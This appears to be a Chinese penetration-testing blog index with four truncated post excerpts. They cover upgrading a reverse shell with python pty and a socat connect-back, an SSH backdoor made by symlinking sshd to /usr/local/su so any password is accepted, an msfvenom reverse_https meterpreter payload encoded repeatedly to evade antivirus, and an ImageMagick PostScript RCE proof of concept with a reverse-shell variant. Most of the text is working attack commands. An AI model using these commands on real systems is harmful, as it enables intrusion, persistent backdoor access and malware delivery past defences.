NC,bash反弹后非标准终端使用注意

一般在渗透过程中会反弹一个bash shell,但是此类反弹,命令行终端非正规的终端,键盘上下翻动无历史记录,vim编辑文件的时候,可能就会over。因为反弹出来的shell没有Sigint的,如果Ctrl+C,反弹出来的shell就会终止。这个日常操作过程中多少都会有人遇到过。然后往此反复重新反弹…. 1.可以弄一个伪终端,但是Ctrl+C还是会退出,但是显示效果和正式终端一样。 反弹成功后执行: python -c ‘import pty; pty.spawn(“/bin/bash”)’ 之后再 su 进入伪终端 2.使用socat反弹终端 监听机器执行: socat file:`tty`,raw,echo=0 tcp-listen:5555 靶机执行: socat exec:’bash -li’,pty,stderr,setsid,sigint,sane tcp:xxx. […]

查看全部


ssh 软连接后门使用

通过软连接建立一个ssh后门: ln -sf /usr/sbin/sshd /usr/local/su;/usr/local/su -oPort=12345 说明:建立软连接到/usr/local/su 文件,也可以在其他目录,su文件名字不能变,变了就无法登录。当然可以通过其他设置,更改su名字也是可以的。然后启动,并指定监听12345端口,登录的时候密码随意即可,登录如下: ssh [email protected] -p 12345 注意:这个如果目标在执行软连接的时候,如果使用了其他账号创建,则登录的时候需要使用对应的账号,而非root 上面提到要更改软连接su名字,需要用以下命令,xxxxxx为你需要更改的名字: echo ” #%PAM-1.0 auth       sufficient   pam_rootok.so auth & […]

查看全部


shellcode貌似又不免杀了,继续更新….(20190525)

之前说过使用msf生成shellcode 使用特殊编码十五六次就可以过静态查杀了,奈何Anti Virus(反病毒软件), 简称AV。不可能一直允许的啊…. 不废话了,直接还是shellcode生成,继续过AV。 msfvenom -p windows/meterpreter/reverse_https lhost=xxx.xxx.xxx.xxx lport=8888 -e x86/shikata_ga_nai -i 15 –smallest -b ‘\x00’ -f c > 1 把1里的shellcode编译成exe即可,至于为什么能过AV,可能是使用了http协议,对于日一台web服务器,AV们也不敢管,也不敢细问啊….

查看全部


imagemagic RCE PoC

1.下列内容保存为png,即可(touch 1.png &&vi 1.png) 之后执行convert 1.png 1.gif 之后你就会看到,执行了 >$ id (如果ubuntu测试的时候没有,可以手动安装imagemagic  —-> apt install imagemagick   %!PS userdict /setpagedevice undef save legal { null restore } stopped { pop } if { legal } stopped { pop } if restore mark /OutputFile (%pipe%id) currentdevice putdeviceprops 如果需要nc反弹可以输入如下:   %!PS userdict /setpagedevice […]

查看全部